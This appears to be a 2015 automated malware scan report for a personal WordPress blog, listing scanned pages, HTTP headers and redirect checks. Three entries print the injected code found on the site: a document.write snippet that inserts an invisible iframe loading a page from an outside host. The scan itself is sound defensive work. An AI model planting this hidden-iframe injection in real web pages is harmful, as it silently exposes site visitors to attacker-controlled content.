Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theheilmans.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://theheilmans.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 03 Mar 2015 16:29:09 GMT Pragma: no-cache Location: http://www.theheilmans.com/ Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=872f6669698f401ddbd5cc7f70b365c3; path=/ X-Pingback: http://www.theheilmans.com/xmlrpc.php X-Powered-By: PHP/5.3.25 | clean |
http://www.theheilmans.com/ | 200 OK Content-Length: 14362 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://nu.uv.ro/ads/ads.php"></iframe></div>'); Antivirus reports:
| ||
http://www.theheilmans.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://www.theheilmans.com/wp-content/plugins/super-rss-reader/public/srr-js.js?ver=3.5.1 | 200 OK Content-Length: 5249 Content-Type: application/javascript | clean |
http://www.theheilmans.com/wp-content/themes/u-design/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=3.1.3 | 200 OK Content-Length: 24867 Content-Type: application/javascript | clean |
http://www.theheilmans.com/wp-content/themes/u-design/scripts/superfish-1.4.8/js/superfish.combined.js?ver=1.0.0 | 200 OK Content-Length: 5387 Content-Type: application/javascript | clean |
http://www.theheilmans.com/wp-content/themes/u-design/scripts/script.js?ver=1.0 | 200 OK Content-Length: 7253 Content-Type: application/javascript | clean |
http://theheilmans.api.oneall.com/socialize/library.js | 200 OK Content-Length: 42708 Content-Type: text/javascript | clean |
http://www.theheilmans.com/wp-content/themes/u-design/scripts/prettyPhoto/custom_params.js?ver=3.1.3 | 200 OK Content-Length: 7985 Content-Type: application/javascript | clean |
http://theheilmans.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 03 Mar 2015 16:29:18 GMT Pragma: no-cache Location: http://www.theheilmans.com/test404page.js Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=e062e123735637b7a8aca4743bca08d5; path=/ X-Pingback: http://www.theheilmans.com/xmlrpc.php X-Powered-By: PHP/5.3.25 | clean |
http://www.theheilmans.com/test404page.js | 404 Not Found Content-Length: 10309 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://nu.uv.ro/ads/ads.php"></iframe></div>'); Antivirus reports:
| ||
http://www.theheilmans.com/blog/ | 200 OK Content-Length: 30234 Content-Type: text/html | clean |
http://www.theheilmans.com/wp-includes/js/comment-reply.min.js?ver=3.5.1 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://www.theheilmans.com/2012/07-08/chemo-3-and-4/ | 200 OK Content-Length: 15905 Content-Type: text/html | clean |
http://www.theheilmans.com/author/erin/ | 200 OK Content-Length: 14393 Content-Type: text/html | clean |
http://www.theheilmans.com/erin | 404 Not Found Content-Length: 10309 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://nu.uv.ro/ads/ads.php"></iframe></div>'); Antivirus reports:
| ||
http://www.theheilmans.com/2012/06-13/how-i-am-feeling/ | 200 OK Content-Length: 16093 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: theheilmans.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Mar 2015 16:29:09 GMT
Pragma: no-cache
Location: http://www.theheilmans.com/
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=872f6669698f401ddbd5cc7f70b365c3; path=/
X-Pingback: http://www.theheilmans.com/xmlrpc.php
X-Powered-By: PHP/5.3.25
...0 bytes of data.
GET / HTTP/1.1
Host: theheilmans.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Mar 2015 16:29:09 GMT
Pragma: no-cache
Location: http://www.theheilmans.com/
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=872f6669698f401ddbd5cc7f70b365c3; path=/
X-Pingback: http://www.theheilmans.com/xmlrpc.php
X-Powered-By: PHP/5.3.25
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: theheilmans.com
Referer: http://www.google.com/search?q=theheilmans.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: theheilmans.com
Referer: http://www.google.com/search?q=theheilmans.com
Result:
The result is similar to the first query. There are no suspicious redirects found.